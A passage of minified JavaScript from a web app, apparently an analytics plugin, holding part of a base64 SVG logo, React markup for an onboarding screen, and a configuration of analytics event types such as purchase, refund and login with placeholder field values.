guNTQsMS41LjU0WiIvPjxwYXRoIGQ9Im00NTkuNTIsMTc2LjYxbC0uNjMtMi4wN2gtLjExYy0uNzIuOTEtMS40NCwxLjUyLTIuMTcsMS44NS0uNzMuMzMtMS42Ni40OS0yLjguNDktMS40NiwwLTIuNjEtLjQtMy40My0xLjE5LS44Mi0uNzktMS4yMy0xLjkxLTEuMjMtMy4zNSwwLTEuNTMuNTctMi42OSwxLjcxLTMuNDcsMS4xNC0uNzgsMi44OC0xLjIxLDUuMjEtMS4yOGwyLjU3LS4wOHYtLjc5YzAtLjk1LS4yMi0xLjY2LS42Ny0yLjEzLS40NC0uNDctMS4xMy0uNzEtMi4wNy0uNzEtLjc2LDAtMS40OS4xMS0yLjE5LjM0cy0xLjM3LjQ5LTIuMDIuNzlsLTEuMDItMi4yNmMuODEtLjQyLDEuNjktLjc0LDIuNjUtLjk2Ljk2LS4yMiwxLjg3LS4zMywyLjcyLS4zMywxLjg5LDAsMy4zMi40MSw0LjI5LDEuMjQuOTYuODMsMS40NSwyLjEyLDEuNDUsMy44OXYxMC4wM2gtMi4yNlptLTQuNzEtMi4xNWMxLjE1LDAsMi4wNy0uMzIsMi43Ny0uOTZzMS4wNC0xLjU0LDEuMDQtMi43di0xLjI5bC0xLjkxLjA4Yy0xLjQ5LjA1LTIuNTcuMy0zLjI1Ljc1cy0xLjAyLDEuMTItMS4wMiwyLjA0YzAsLjY2LjIsMS4xOC41OSwxLjU0LjM5LjM2Ljk5LjU0LDEuNzguNTRaIi8+PHBhdGggZD0ibTQ3My43NSwxNjEuNDVjLjY0LDAsMS4xNi4wNCwxLjU4LjEzbC0uMzEsMi45NWMtLjQ1LS4xMS0uOTItLjE2LTEuNC0uMTYtMS4yNywwLTIuMjkuNDEtMy4wOCwxLjI0LS43OS44My0xLjE4LDEuOS0xLjE4LDMuMjJ2Ny43OGgtMy4xNnYtMTQuODloMi40OGwuNDIsMi42M2guMTZjLjQ5LS44OSwxLjE0LTEuNTksMS45My0yLjExLjc5LS41MiwxLjY1LS43OCwyLjU2LS43OFoiLz48cGF0aCBkPSJtNDgzLjYzLDE3NC4zM2MuNzcsMCwxLjU0LS4xMiwyLjMyLS4zNnYyLjM4Yy0uMzUuMTUtLjguMjgtMS4zNS4zOC0uNTUuMS0xLjEyLjE2LTEuNzIuMTYtMywwLTQuNS0xLjU4LTQuNS00Ljc0di04LjAzaC0yLjAzdi0xLjRsMi4xOC0xLjE2LDEuMDgtMy4xNWgxLjk1djMuMzFoNC4yNHYyLjRoLTQuMjR2Ny45N2MwLC43Ni4xOSwxLjMzLjU3LDEuNjkuMzguMzYuODguNTQsMS41LjU0WiIvPjxwYXRoIGQ9Im00OTUuNDMsMTc2Ljg4Yy0yLjMyLDAtNC4xMy0uNjgtNS40My0yLjAzLTEuMzEtMS4zNS0xLjk2LTMuMjEtMS45Ni01LjU4cy42MS00LjM0LDEuODItNS43NGMxLjIxLTEuMzksMi44OC0yLjA5LDUtMi4wOSwxLjk3LDAsMy41Mi42LDQuNjYsMS43OSwxLjE0LDEuMTksMS43MSwyLjg0LDEuNzEsNC45M3YxLjcxaC05LjkyYy4wNCwxLjQ1LjQ0LDIuNTYsMS4xNywzLjMzLjc0Ljc4LDEuNzcsMS4xNiwzLjExLDEuMTYuODgsMCwxLjctLjA4LDIuNDYtLjI1Ljc2LS4xNywxLjU3LS40NCwyLjQ0LS44M3YyLjU3Yy0uNzcuMzctMS41NS42My0yLjM0Ljc4LS43OS4xNS0xLjY5LjIzLTIuNzEuMjNabS0uNTgtMTMuMDNjLTEuMDEsMC0xLjgxLjMyLTIuNDIuOTYtLjYxLjY0LS45NywxLjU3LTEuMDgsMi43OWg2Ljc2Yy0uMDItMS4yMy0uMzEtMi4xNi0uODktMi43OS0uNTctLjYzLTEuMzYtLjk1LTIuMzctLjk1WiIvPjxwYXRoIGQ9Im01MDkuODQsMTc2Ljg4Yy0xLjg2LDAtMy4zMS0uNjctNC4zNS0yLjAyLTEuMDQtMS4zNS0xLjU2LTMuMjQtMS41Ni01LjY3cy41My00LjM0LDEuNTgtNS43YzEuMDUtMS4zNiwyLjUyLTIuMDQsNC4zOC0yLjA0czMuNDUuNzIsNC40NywyLjE3aC4xNmMtLjE1LTEuMDctLjIzLTEuOTEtLjIzLTIuNTN2LTUuNDNoMy4xOHYyMC45NWgtMi40OGwtLjU1LTEuOTVoLS4xNWMtMS4wMSwxLjQ4LTIuNSwyLjIyLTQuNDYsMi4yMlptLjg1LTIuNTZjMS4zLDAsMi4yNS0uMzcsMi44NC0xLjEuNTktLjczLjktMS45Mi45Mi0zLjU2di0uNDRjMC0xLjg4LS4zLTMuMjEtLjkyLTRzLTEuNTctMS4xOS0yLjg3LTEuMTljLTEuMTEsMC0xLjk3LjQ1LTIuNTcsMS4zNS0uNi45LS45LDIuMTktLjksMy44NnMuMjksMi45MS44OCwzLjc4Yy41OC44NywxLjQ2LDEuMywyLjYzLDEuM1oiLz48cGF0aCBkPSJtNTI1LjI4LDE3My43MmMtLjQzLDEuNjctMS4yMiwzLjgyLTIuMzcsNi40NWgtMi4zM2MuNjItMi40MiwxLjA4LTQuNjgsMS4zOS02Ljc2aDMuMTFsLjIuMzFaIi8+PHBhdGggZD0ibTM1Ni4yOSwyMDQuODhjLTMuMjksMC01Ljg4LDEuMTctNy43NiwzLjVzLTIuODMsNS41NS0yLjgzLDkuNjYuOTEsNy41NSwyLjcyLDkuNzVjMS44MSwyLjIsNC40NCwzLjMxLDcuODcsMy4zMSwxLjQ5LDAsMi45Mi0uMTUsNC4zMS0uNDRzMi44My0uNjcsNC4zNC0xLjE0djQuOTFjLTIuNzUsMS4wNC01Ljg2LDEuNTYtOS4zNCwxLjU2LTUuMTMsMC05LjA2LTEuNTUtMTEuODEtNC42Ni0yLjc1LTMuMTEtNC4xMi03LjU1LTQuMTItMTMuMzMsMC0zLjY0LjY3LTYuODMsMi05LjU2czMuMjYtNC44Miw1Ljc5LTYuMjhjMi41Mi0xLjQ1LDUuNDktMi4xOCw4Ljg5LTIuMTgsMy41OCwwLDYuODguNzUsOS45MiwyLjI1bC0yLjA2LDQuNzdjLTEuMTgtLjU2LTIuNDMtMS4wNS0zLjc1LTEuNDctMS4zMi0uNDItMi43LS42My00LjE2LS42M1oiLz48cGF0aCBkPSJtMzc3LjUyLDIzNS41aC01LjYzdi0zNy4yOGg1LjYzdjM3LjI4WiIvPjxwYXRoIGQ9Im0zODUuMjMsMjAxLjk4YzAtMS4wMS4yOC0xLjc4LjgzLTIuMzIuNTUtLjU0LDEuMzQtLjgxLDIuMzYtLjgxczEuNzYuMjcsMi4zMS44MWMuNTUuNTQuODMsMS4zMi44MywyLjMycy0uMjgsMS43MS0uODMsMi4yNmMtLjU1LjU1LTEuMzIuODMtMi4zMS44M3MtMS44MS0uMjgtMi4zNi0uODMtLjgzLTEuMzEtLjgzLTIuMjZabTUuOTcsMzMuNTJoLTUuNjN2LTI2LjVoNS42M3YyNi41WiIvPjxwYXRoIGQ9Im00MDkuOTQsMjM1Ljk4Yy00LjAxLDAtNy4wNi0xLjE3LTkuMTQtMy41MS0yLjA4LTIuMzQtMy4xMy01LjctMy4xMy0xMC4wN3MxLjA5LTcuODgsMy4yNy0xMC4yOGMyLjE4LTIuNCw1LjMzLTMuNTksOS40NS0zLjU5LDIuNzksMCw1LjMxLjUyLDcuNTUsMS41NmwtMS43LDQuNTNjLTIuMzgtLjkzLTQuMzQtMS4zOS01Ljg5LTEuMzktNC41OCwwLTYuODgsMy4wNC02Ljg4LDkuMTMsMCwyLjk3LjU3LDUuMiwxLjcxLDYuNywxLjE0LDEuNDksMi44MiwyLjI0LDUuMDIsMi4yNCwyLjUxLDAsNC44OC0uNjIsNy4xMi0xLjg3djQuOTFjLTEuMDEuNTktMi4wOCwxLjAxLTMuMjIsMS4yNy0xLjE0LjI2LTIuNTMuMzgtNC4xNi4zOFoiLz48cGF0aCBkPSJtNDI4Ljk4LDIyMS41MWwzLjE5LTMuOTgsOC04LjUzaDYuNDlsLTEwLjY2LDExLjM4LDExLjMzLDE1LjEyaC02LjYxbC04LjUxLTExLjYyLTMuMDksMi41NHY5LjA4aC01LjU4di0zNy4yOGg1LjU4djE4LjE5bC0uMjksNS4xaC4xNFoiLz48cGF0aCBkPSJtNDcyLjE2LDIyMC4zM2gtOS41NHYtNC4yN2g5LjU0di05Ljc4aDQuMzF2OS43OGg5LjU2djQuMjdoLTkuNTZ2OS43M2gtNC4zMXYtOS43M1oiIGZpbGw9IiM3ODVhZmEiLz48cGF0aCBkPSJtNTE0Ljk4LDIzMS40MmMxLjM3LDAsMi43NS0uMjIsNC4xMi0uNjV2NC4yNGMtLjYyLjI3LTEuNDMuNS0yLjQxLjY4LS45OC4xOC0yLC4yOC0zLjA1LjI4LTUuMzMsMC04LTIuODEtOC04LjQzdi0xNC4yOGgtMy42MnYtMi40OWwzLjg4LTIuMDYsMS45Mi01LjYxaDMuNDd2NS44OWg3LjU1djQuMjZoLTcuNTV2MTQuMThjMCwxLjM2LjM0LDIuMzYsMS4wMiwzLjAxLjY4LjY1LDEuNTcuOTcsMi42Ny45N1oiLz48cGF0aCBkPSJtNTQ3LjksMjIyLjJjMCw0LjMzLTEuMTEsNy43MS0zLjMzLDEwLjEzLTIuMjIsMi40My01LjMxLDMuNjQtOS4yNywzLjY0LTIuNDgsMC00LjY2LS41Ni02LjU2LTEuNjgtMS45LTEuMTItMy4zNi0yLjcyLTQuMzgtNC44Mi0xLjAyLTIuMDktMS41My00LjUyLTEuNTMtNy4yOCwwLTQuMywxLjEtNy42NSwzLjMxLTEwLjA2czUuMzEtMy42Miw5LjMyLTMuNjIsNi44NywxLjIzLDkuMSwzLjcsMy4zNSw1Ljc5LDMuMzUsOS45OFptLTE5LjI5LDBjMCw2LjEyLDIuMjYsOS4xOCw2Ljc4LDkuMThzNi43MS0zLjA2LDYuNzEtOS4xOC0yLjI1LTkuMDgtNi43Ni05LjA4Yy0yLjM2LDAtNC4wOC43OC01LjE0LDIuMzVzLTEuNTksMy44MS0xLjU5LDYuNzNaIi8+PHBhdGggZD0ibTU4My42OSwyMzUuNWwtMS4xMy0zLjY5aC0uMTljLTEuMjgsMS42MS0yLjU2LDIuNzEtMy44NiwzLjI5cy0yLjk2Ljg4LTQuOTguODhjLTIuNiwwLTQuNjQtLjctNi4xLTIuMTFzLTIuMTktMy4zOS0yLjE5LTUuOTdjMC0yLjczLDEuMDEtNC43OSwzLjA0LTYuMThzNS4xMi0yLjE1LDkuMjctMi4yOGw0LjU4LS4xNHYtMS40MWMwLTEuNjktLjQtMi45Ni0xLjE5LTMuOC0uNzktLjg0LTIuMDItMS4yNi0zLjY4LTEuMjYtMS4zNiwwLTIuNjYuMi0zLjkxLjYtMS4yNS40LTIuNDQuODctMy41OSwxLjQxbC0xLjgyLTQuMDNjMS40NC0uNzUsMy4wMS0xLjMyLDQuNzItMS43MSwxLjcxLS4zOSwzLjMyLS41OSw0Ljg0LS41OSwzLjM3LDAsNS45MS43NCw3LjYzLDIuMiwxLjcyLDEuNDcsMi41OCwzLjc4LDIuNTgsNi45MnYxNy44NWgtNC4wM1ptLTguMzktMy44M2MyLjA0LDAsMy42OS0uNTcsNC45Mi0xLjcxLDEuMjQtMS4xNCwxLjg2LTIuNzQsMS44Ni00Ljh2LTIuM2wtMy40LjE0Yy0yLjY1LjEtNC41OC41NC01Ljc5LDEuMzMtMS4yMS43OS0xLjgxLDItMS44MSwzLjYzLDAsMS4xOC4zNSwyLjEsMS4wNSwyLjc0LjcuNjUsMS43Ni45NywzLjE2Ljk3WiIvPjxwYXRoIGQ9Im02MDQuNTEsMjM1Ljk4Yy0zLjMxLDAtNS44OS0xLjItNy43NC0zLjU5LTEuODUtMi40LTIuNzgtNS43Ni0yLjc4LTEwLjA5cy45NC03LjczLDIuODEtMTAuMTUsNC40OC0zLjYzLDcuOC0zLjYzLDYuMTMsMS4yOSw3Ljk2LDMuODZoLjI5Yy0uMjctMS45LS40MS0zLjQtLjQxLTQuNXYtOS42Nmg1LjY1djM3LjI4aC00LjQxbC0uOTgtMy40N2gtLjI2Yy0xLjgsMi42NC00LjQ1LDMuOTUtNy45MywzLjk1Wm0xLjUxLTQuNTVjMi4zMiwwLDQtLjY1LDUuMDYtMS45NSwxLjA1LTEuMywxLjYtMy40MiwxLjYzLTYuMzR2LS43OWMwLTMuMzQtLjU0LTUuNzEtMS42My03LjEyLTEuMDktMS40MS0yLjc5LTIuMTEtNS4xLTIuMTEtMS45OCwwLTMuNTEuOC00LjU4LDIuNDEtMS4wNywxLjYxLTEuNjEsMy44OS0xLjYxLDYuODdzLjUyLDUuMTgsMS41Niw2LjcyYzEuMDQsMS41NCwyLjU5LDIuMzEsNC42NywyLjMxWiIvPjxwYXRoIGQ9Im02MzUuMDgsMjM1Ljk4Yy0zLjMxLDAtNS44OS0xLjItNy43NC0zLjU5LTEuODUtMi40LTIuNzgtNS43Ni0yLjc4LTEwLjA5cy45NC03LjczLDIuODEtMTAuMTUsNC40OC0zLjYzLDcuOC0zLjYzLDYuMTMsMS4yOSw3Ljk2LDMuODZoLjI5Yy0uMjctMS45LS40MS0zLjQtLjQxLTQuNXYtOS42Nmg1LjY1djM3LjI4aC00LjQxbC0uOTgtMy40N2gtLjI2Yy0xLjgsMi42NC00LjQ1LDMuOTUtNy45MywzLjk1Wm0xLjUxLTQuNTVjMi4zMiwwLDQtLjY1LDUuMDYtMS45NSwxLjA1LTEuMywxLjYtMy40MiwxLjYzLTYuMzR2LS43OWMwLTMuMzQtLjU0LTUuNzEtMS42My03LjEyLTEuMDktMS40MS0yLjc5LTIuMTEtNS4xLTIuMTEtMS45OCwwLTMuNTEuOC00LjU4LDIuNDEtMS4wNywxLjYxLTEuNjEsMy44OS0xLjYxLDYuODdzLjUyLDUuMTgsMS41Niw2LjcyYzEuMDQsMS41NCwyLjU5LDIuMzEsNC42NywyLjMxWiIvPjxwYXRoIGQ9Im02ODYuMDUsMjM1LjVsLTEuMTMtMy42OWgtLjE5Yy0xLjI4LDEuNjEtMi41NiwyLjcxLTMuODYsMy4yOXMtMi45Ni44OC00Ljk4Ljg4Yy0yLjYsMC00LjY0LS43LTYuMS0yLjExcy0yLjE5LTMuMzktMi4xOS01Ljk3YzAtMi43MywxLjAxLTQuNzksMy4wNC02LjE4czUuMTItMi4xNSw5LjI3LTIuMjhsNC41OC0uMTR2LTEuNDFjMC0xLjY5LS40LTIuOTYtMS4xOS0zLjgtLjc5LS44NC0yLjAyLTEuMjYtMy42OC0xLjI2LTEuMzYsMC0yLjY2LjItMy45MS42LTEuMjUuNC0yLjQ0Ljg3LTMuNTksMS40MWwtMS44Mi00LjAzYzEuNDQtLjc1LDMuMDEtMS4zMiw0LjcyLTEuNzEsMS43MS0uMzksMy4zMi0uNTksNC44NC0uNTksMy4zNywwLDUuOTEuNzQsNy42MywyLjIsMS43MiwxLjQ3LDIuNTgsMy43OCwyLjU4LDYuOTJ2MTcuODVoLTQuMDNabS04LjM5LTMuODNjMi4wNCwwLDMuNjktLjU3LDQuOTItMS43MSwxLjI0LTEuMTQsMS44Ni0yLjc0LDEuODYtNC44di0yLjNsLTMuNC4xNGMtMi42NS4xLTQuNTguNTQtNS43OSwxLjMzLTEuMjEuNzktMS44MSwyLTEuODEsMy42MywwLDEuMTguMzUsMi4xLDEuMDUsMi43NC43LjY1LDEuNzYuOTcsMy4xNi45N1oiLz48cGF0aCBkPSJtNzIxLjI0LDIzNS41aC01LjY1di0xNi4yOWMwLTIuMDQtLjQxLTMuNTctMS4yMy00LjU4LS44Mi0xLjAxLTIuMTMtMS41MS0zLjkyLTEuNTEtMi4zOCwwLTQuMTIuNy01LjIyLDIuMTEtMS4xLDEuNDEtMS42NSwzLjc2LTEuNjUsNy4wN3YxMy4yaC01LjYzdi0yNi41aDQuNDFsLjc5LDMuNDdoLjI5Yy44LTEuMjYsMS45My0yLjI0LDMuNC0yLjkyLDEuNDctLjY5LDMuMS0xLjAzLDQuODktMS4wMyw2LjM2LDAsOS41NCwzLjIzLDkuNTQsOS43djE3LjI3WiIvPjxwYXRoIGQ9Im03NTMuNCwyMzUuOThjLTQuMTIsMC03LjM0LTEuMi05LjY3LTMuNjEtMi4zMi0yLjQtMy40OS01LjcxLTMuNDktOS45M3MxLjA4LTcuNzMsMy4yMy0xMC4yMSw1LjEyLTMuNzEsOC44OS0zLjcxYzMuNSwwLDYuMjYsMS4wNiw4LjI5LDMuMTksMi4wMywyLjEyLDMuMDQsNS4wNSwzLjA0LDguNzd2My4wNGgtMTcuNjZjLjA4LDIuNTcuNzcsNC41NSwyLjA4LDUuOTNzMy4xNiwyLjA3LDUuNTQsMi4wN2MxLjU3LDAsMy4wMi0uMTUsNC4zNy0uNDQsMS4zNS0uMjksMi44LS43OSw0LjM1LTEuNDd2NC41OGMtMS4zNy42NS0yLjc2LDEuMTItNC4xNywxLjM5LTEuNDEuMjctMy4wMS40MS00LjgyLjQxWm0tMS4wMy0yMy4xOWMtMS43OSwwLTMuMjIuNTctNC4zLDEuNy0xLjA4LDEuMTMtMS43MiwyLjc5LTEuOTMsNC45NmgxMi4wM2MtLjAzLTIuMTktLjU2LTMuODUtMS41OC00Ljk3cy0yLjQzLTEuNjktNC4yMi0xLjY5WiIvPjxwYXRoIGQ9Im03NzUuMTUsMjM1LjVsLTEwLjA2LTI2LjVoNS45NGw1LjM5LDE1LjQxYy45MywyLjU5LDEuNDksNC42OCwxLjY4LDYuMjhoLjE5Yy4xNC0xLjE1LjctMy4yNCwxLjY4LTYuMjhsNS4zOS0xNS40MWg1Ljk5bC0xMC4xMSwyNi41aC02LjA4WiIvPjxwYXRoIGQ9Im04MDYuOTUsMjM1Ljk4Yy00LjEyLDAtNy4zNC0xLjItOS42Ny0zLjYxLTIuMzItMi40LTMuNDktNS43MS0zLjQ5LTkuOTNzMS4wOC03LjczLDMuMjMtMTAuMjEsNS4xMi0zLjcxLDguODktMy43MWMzLjUsMCw2LjI2LDEuMDYsOC4yOSwzLjE5LDIuMDMsMi4xMiwzLjA0LDUuMDUsMy4wNCw4Ljc3djMuMDRoLTE3LjY2Yy4wOCwyLjU3Ljc3LDQuNTUsMi4wOCw1LjkzczMuMTYsMi4wNyw1LjU0LDIuMDdjMS41NywwLDMuMDItLjE1LDQuMzctLjQ0LDEuMzUtLjI5LDIuOC0uNzksNC4zNS0xLjQ3djQuNThjLTEuMzcuNjUtMi43NiwxLjEyLTQuMTcsMS4zOS0xLjQxLjI3LTMuMDEuNDEtNC44Mi40MVptLTEuMDMtMjMuMTljLTEuNzksMC0zLjIyLjU3LTQuMywxLjctMS4wOCwxLjEzLTEuNzIsMi43OS0xLjkzLDQuOTZoMTIuMDNjLS4wMy0yLjE5LS41Ni0zLjg1LTEuNTgtNC45N3MtMi40My0xLjY5LTQuMjItMS42OVoiLz48cGF0aCBkPSJtODQ2Ljk2LDIzNS41aC01LjY1di0xNi4yOWMwLTIuMDQtLjQxLTMuNTctMS4yMy00LjU4LS44Mi0xLjAxLTIuMTMtMS41MS0zLjkyLTEuNTEtMi4zOCwwLTQuMTIuNy01LjIyLDIuMTEtMS4xLDEuNDEtMS42NSwzLjc2LTEuNjUsNy4wN3YxMy4yaC01LjYzdi0yNi41aDQuNDFsLjc5LDMuNDdoLjI5Yy44LTEuMjYsMS45My0yLjI0LDMuNC0yLjkyLDEuNDctLjY5LDMuMS0xLjAzLDQuODktMS4wMyw2LjM2LDAsOS41NCwzLjIzLDkuNTQsOS43djE3LjI3WiIvPjxwYXRoIGQ9Im04NjQuNjYsMjMxLjQyYzEuMzcsMCwyLjc1LS4yMiw0LjEyLS42NXY0LjI0Yy0uNjIuMjctMS40My41LTIuNDEuNjgtLjk4LjE4LTIsLjI4LTMuMDUuMjgtNS4zMywwLTgtMi44MS04LTguNDN2LTE0LjI4aC0zLjYydi0yLjQ5bDMuODgtMi4wNiwxLjkyLTUuNjFoMy40N3Y1Ljg5aDcuNTV2NC4yNmgtNy41NXYxNC4xOGMwLDEuMzYuMzQsMi4zNiwxLjAyLDMuMDEuNjguNjUsMS41Ny45NywyLjY3Ljk3WiIvPjxwYXRoIGQ9Im03MzYuMzUsMTEuOThsLTE3LjkxLDM4LjA1LDE3LjY1LTQuMjMsMTYuMzksOC4yNS0xMy42Mi00MS44MWMtLjI1LTEuMjgtMi4wMS0xLjQ2LTIuNTEtLjI2WiIgZmlsbD0iIzc4NWFmYSIvPjxwYXRoIGQ9Im0yNDcuNDgsMTIzLjI1YzEuMzksNy41OCw2LjMzLDExLjY1LDE1LjEyLDEyLjQ1LDcuNTcuNjksMTYuNzUuOTYsMjQuNzMuNzNsOS42LDkuNDRjLjM5LjM4LjkyLjU5LDEuNDUuNTkuMjEsMCwuNDItLjAzLjYzLS4xLjczLS4yNCwxLjI4LS44NSwxLjQxLTEuNjFsMS43Ni05Ljg1YzUuMjUtMS42MSw4LjMxLTUuMzQsOS4zMy0xMS4zNSwxLjMzLTcuODMsMi4xNC0xNi4xNSwyLjE3LTIyLjI2LjA0LTYuODMtNS4yNy0xMi4yNC0xMi45Mi0xMy4xNi03LjQ3LS45LTIyLjI5LTIuNS0zNy42OC0zLjE1LTEwLjA5LS40Ni0xNi4zLDQuNzYtMTYuOTEsMTQuMjUtLjM5LDYuMjUuMjUsMTguMzYsMS4yOSwyNC4wMlptMzcuMDksNC4wM2MtLjI0LDEuMjUtLjkzLDIuMDktMi4wNSwyLjUyLS44NS4zMi0xLjczLjM1LTIuNjQuMDctLjk5LS4zMS0xLjY1LS45MS0xLjk4LTEuNzktLjM4LTEuMDItLjQ0LTIuMDctLjE3LTMuMTcuMzItMS4zMywxLjA4LTIuMjMsMi4yOS0yLjY5LDEuMDItLjM4LDEuOTUtLjMsMi44MS4yNS42OS40NiwxLjE5LDEuMTEsMS41MSwxLjk3LjM1LjkxLjQyLDEuODYuMjMsMi44NFptMi42My0xNy42OWMtLjA4LjExLS45OCwxLjQ1LTIuNzIsNC0xLjEyLDEuNjItMS45LDMuMDItMi4zNiw0LjItLjQyLDEuMDctMS4wNiwxLjc2LTEuOTMsMi4wOXMtMS43Mi4yOS0yLjYtLjA4Yy0uODgtLjM4LTEuNDctLjk3LTEuNzctMS43OC0uNDUtMS4yLDAtMi45LDEuMzgtNS4xMSwxLjMxLTEuOTMsMi42MS0zLjg3LDMuOTEtNS44MSwxLjM4LTIuMTksMS44NC0zLjg4LDEuMzktNS4wNy0uNTMtMS4zOS0xLjcyLTIuNDMtMy42LTMuMTEtMS44Ny0uNjktMy41OC0uNzQtNS4xLS4xNi0uODEuMzEtMS43NCwxLjE4LTIuOCwyLjY0LTEuMDYsMS40NS0xLjg4LDIuMjktMi40NiwyLjUxLS44OC4zMy0xLjc1LjI5LTIuNi0uMTMtLjg1LS40Mi0xLjQzLTEuMDMtMS43My0xLjgyLS41Ny0xLjUuMjMtMy4zNiwyLjM4LTUuNTksMS44MS0xLjksMy40NS0zLjEzLDQuOTItMy42OCwzLjI1LTEuMjMsNi42NC0xLjE0LDEwLjE3LjI2LDMuNTMsMS40LDUuODgsMy42NSw3LjA1LDYuNzVzLjY1LDYuMzctMS41Miw5LjkxWiIvPjxwYXRoIGQ9Im01NDMuMTQsMTcxLjM4czcyLjUxLS4xOSw5Ni43NC0zNC40MWMyMi4xNS0zMS4yNy0yMy41NC0zOC42NS0yMS42Mi0xMi42M3MxMTUuMjksMzgsMTE3Ljg1LTg0LjAxIiBmaWxsPSJub25lIiBzdHJva2U9IiM3ODVhZmEiIHN0cm9rZS1kYXNoYXJyYXk9IjAgMCAzIDgiIHN0cm9rZS1saW5lY2FwPSJyb3VuZCIgc3Ryb2tlLW1pdGVybGltaXQ9IjEwIiBzdHJva2Utd2lkdGg9IjQiLz48L3N2Zz4=",alt:""}),(0,e.createElement)("div",null),(0,e.createElement)("div",{className:"pt-4 border-t border-gray-300 w-full items-center text-center"},(0,e.createElement)("span",{className:"text-2xl"},"Not sure how to get started?"),(0,e.createElement)("button",{type:"button",onClick:()=>a(!0),className:o()("capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent ","bg-brand-primary text-white","px-4 py-2","text-sm font-medium","shadow hover:shadow-xl","transform active:scale-75 hover:scale-110 transition-transform","hover:ring-2 hover:ring-white hover:ring-offset-2","focus:outline-none focus:ring-2 focus:ring-white focus:ring-offset-2","ml-4","hover:text-white")},(0,e.createElement)("span",{className:"mx-2"},"Get Help"),(0,e.createElement)(dr(),{className:"h-5 w-5","aria-hidden":"true"}))),(0,e.createElement)("div",{className:"hidden py-16"},(0,e.createElement)("div",{className:"text-center"},(0,e.createElement)("h1",{className:"mt-2 text-4xl font-extrabold text-gray-900 tracking-tight sm:text-5xl"},"Add your first custom event."),(0,e.createElement)("div",{className:"mt-6"},(0,e.createElement)("button",{type:"button",className:o()("capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent bg-brand-primary","px-4 py-2","text-sm font-medium text-white","shadow-sm","hover:bg-brand-600","focus:outline-none focus:ring-2 focus:ring-brand-primary-focus focus:ring-offset-2","transform active:scale-75 hover:scale-105 transition-transform")},"Add Custom Event"))))),(0,e.createElement)("footer",{className:"flex-shrink-0 max-w-7xl w-full mx-auto px-4 sm:px-6 lg:px-8"})))},mr={ad_impression:{ad_platform:{type:"text",required:!0,placeholder:"APPXXX"},ad_source:{type:"text",required:!0,placeholder:"Network Name"},ad_unit_name:{type:"text",required:!0,placeholder:"Unit Name"},ad_format:{type:"text",required:!0,placeholder:"Format"},value:{type:"number",required:!0,placeholder:"7.77"},currency:{type:"text",required:!0,placeholder:"USD"}},add_payment_info:{currency:{type:"text",required:!0,placeholder:"USD"},value:{type:"number",required:!0,placeholder:"7.77"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},payment_type:{type:"text",required:!1,placeholder:"Credit Card"},items:{type:"text",required:!0,placeholder:""}},add_shipping_info:{currency:{type:"text",required:!0,placeholder:"USD"},value:{type:"number",required:!0,placeholder:"7.77"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},shipping_tier:{type:"text",required:!1,placeholder:"Ground"},items:{type:"text",required:!0,placeholder:""}},add_to_cart:{currency:{type:"text",required:!0,placeholder:"USD"},value:{type:"number",required:!0,placeholder:"7.77"},items:{type:"text",required:!0,placeholder:""}},add_to_wishlist:{currency:{type:"text",required:!0,placeholder:"USD"},value:{type:"number",required:!0,placeholder:"7.77"},items:{type:"text",required:!0,placeholder:""}},begin_checkout:{currency:{type:"text",required:!0,placeholder:"USD"},value:{type:"number",required:!0,placeholder:"7.77"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},items:{type:"text",required:!0,placeholder:""}},earn_virtual_currency:{virtual_currency_name:{type:"text",required:!1,placeholder:"Gems"},value:{type:"number",required:!1,placeholder:"5"}},generate_lead:{currency:{type:"text",required:!0,placeholder:"USD"},value:{type:"number",required:!0,placeholder:"7.77"}},join_group:{group_id:{type:"text",required:!1,placeholder:"G_12345"}},level_end:{level_name:{type:"text",required:!1,placeholder:"The journey begins.."},success:{type:"text",required:!1,placeholder:"true"}},level_start:{level_name:{type:"text",required:!1,placeholder:"The journey begins.."}},level_up:{level:{type:"number",required:!1,placeholder:"5"},character:{type:"text",required:!1,placeholder:"Player 1"}},login:{method:{type:"text",required:!1,placeholder:"Google"}},post_score:{score:{type:"number",required:!0,placeholder:"10000"},level:{type:"number",required:!1,placeholder:"5"},character:{type:"text",required:!1,placeholder:"Player 1"}},purchase:{currency:{type:"text",required:!0,placeholder:"USD"},transaction_id:{type:"text",required:!0,placeholder:"T_12345"},value:{type:"number",required:!0,placeholder:"12.21"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},shipping:{type:"number",required:!1,placeholder:"3.33"},tax:{type:"number",required:!1,placeholder:"1.1"},items:{type:"text",required:!0,placeholder:""}},refund:{currency:{type:"text",required:!0,placeholder:"USD"},transaction_id:{type:"text",required:!0,placeholder:"T_12345"},value:{type:"number",required:!0,placeholder:"7.77"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},shipping:{type:"number",required:!1,placeholder:"3.33"},tax:{type:"number",required:!1,placeholder:"1.1"},items:{type:"text",required:!0,placeholder:""}},remove_from_cart:{currency:{type:"text",required:!0,placeholder:"USD"},value:{type:"number",required:!0,placeholder:"7.77"},items:{type:"text",required:!0,placeholder:""}},search:{search_term:{type:"text",required:!0,placeholder:"t-shirts"}},select_content:{content_type:{type:"text",required:!1,placeholder:"product"},item_id:{type:"text",required:!1,placeholder:"I_12345"}},select_item:{item_list_id:{type:"text",required:!1,placeholder:"SKU_12345"},item_list_name:{type:"text",required:!1,placeholder:"Stan and Friends Tee"},items:{type:"text",required:!0,placeholder:""}},select_promotion:{creative_name:{type:"text",required:!1,placeholder:"summer_banner2"},creative_slot:{type:"text",required:!1,placeholder:"featured_app_1"},location_id:{type:"text",required:!1,placeholder:"L_12345"},promotion_id:{type:"text",required:!1,placeholder:"P_12345"},promotion_name:{type:"text",required:!1,placeholder:"Summer Sale"},items:{type:"text",required:!1,placeholder:""}},share:{method:{type:"text",required:!1,placeholder:"Twitter"},content_type:{type:"text",required:!1,placeholder:"image"},item_id:{type:"text",required:!1,placeholder:"C_12345"}},sign_up:{method:{type:"text",required:!1,placeholder:"Google"}},spend_virtual_currency:{value:{type:"number",required:!0,placeholder:"5"},virtual_currency_name:{type:"text",required:!0,placeholder:"Gems"},item_name:{type:"text",required:!1,placeholder:"Starter 